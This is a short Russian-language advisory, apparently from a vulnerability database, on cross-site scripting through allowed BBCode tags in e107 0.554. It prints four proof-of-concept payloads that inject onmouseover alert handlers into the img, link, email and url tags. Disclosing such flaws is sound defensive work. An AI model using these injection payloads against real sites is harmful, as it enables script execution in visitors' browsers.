Межсайтовый скриптинг в разрешенных тэгах в e107 website system
| Дата публикации: | 30.07.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1356 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Несколько уязвимостей в проверке правильности вводимых данных обнаружено в e107 website system. Удаленный пользователь может выполнить XSS нападение.
В некоторые разрешенные тэги удаленный пользователь может внедрить произвольный код сценария. Пример:
[img][/img] - [img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link][/link] - [link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[emai l][/email] - [email]/foo@bar.com" onmouseover="alert('Vulnerable');[/email]
[url][/url] - [url]/url.htm" onmouseover="alert('Vulnerable');[/url]
Уязвимость обнаружена в e107 0.554
Способов устранения обнаруженной уязвимости не существует в настоящее время. |
| Ссылки: | XSS in e107 website system |